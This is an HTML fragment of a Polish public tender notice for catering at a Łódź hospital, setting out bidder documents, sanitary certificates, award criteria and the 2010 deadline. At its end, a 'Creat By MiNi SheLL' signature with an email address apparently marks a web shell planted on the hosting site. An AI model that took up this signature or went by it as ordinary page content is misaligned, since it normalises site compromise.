<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Decyzję- zezwolenie wydaną przez właściwy Państwowy Inspektorat Sanitarny potwierdzającą spełnienie wymagań koniecznych do prowadzenia zakładu żywienia zbiorowego z uwzględnieniem żywienia pacjentów szpitala.
2. Opinię wydaną przez właściwy Państwowy Inspektorat Sanitarny dotyczącą spełnienia wymogów sanitarnych koniecznych przy przewozie posiłków.
3. Certyfikat HACCP.
4. Wykaz placówek (kuchni) przygotowujących  posiłki ze wskazaniem placówki w której przygotowywane będą posiłki dla Zamawiającego. Wykaz winien zawierać adres placówki, dobową zdolność przerobową.
5. Wykaz zawierający minimum 3 środki transportu które wykorzystywane będą do realizacji zamówienia z podaniem numerów rejestracyjnych wraz z załączoną opinią - zaświadczeniem stwierdzającym spełnianie wymagań sanitarnych dotyczących transportu posiłków wydanym  przez właściwego Państwowego Powiatowego Inspektora Sanitarnego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę w imieniu Wykonawcy, udzielone przez osobę  upoważnioną zgodnie              z właściwym rejestrem. Należy dołączyć do oferty oryginał lub kopię poświadczoną za zgodność z oryginałem             przez udzielającego pełnomocnictwa lub notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Dopuszcza się zmianę umowy w przypadku: 
a)	zmiana stawek podatku VAT
b)	zmniejszenia  cen jednostkowych określonych  w załączniku nr 1 do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.madurowicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital im. M. Madurowicza              w Łodzi, 94 - 029 Łódź, ul. Wileńska 37 budynek ginekologii parter  Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital im. M. Madurowicza              w Łodzi, 94 - 029 Łódź, ul. Wileńska 37 budynek ginekologii parter  Dział Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com